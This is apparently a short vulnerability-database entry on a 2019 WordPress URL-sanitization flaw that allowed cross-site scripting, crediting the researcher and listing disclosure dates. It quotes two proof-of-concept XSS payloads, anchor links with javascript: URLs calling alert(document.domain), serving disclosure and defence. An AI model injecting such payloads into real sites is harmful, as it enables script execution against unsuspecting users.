According to the WordPress release notes: "Props to Soroush Dalili (@irsdl) from NCC Group for disclosing an issue with URL sanitization that can lead to cross-site scripting (XSS) attacks."
Thanks to @irsdl's HackerOne disclosure:
<a href="javascript:alert(document.domain)">JS - Numerical Entities</a>
<a href="javascript:x=1;alert(document.domain)">JS - Hex Entities</a>
Soroush Dalili (@irsdl) - NCC Group
Ryan Dewhurst
No
2019-09-05 (about 3 years ago)
2019-09-05 (about 3 years ago)
2020-09-22 (about 2 years ago)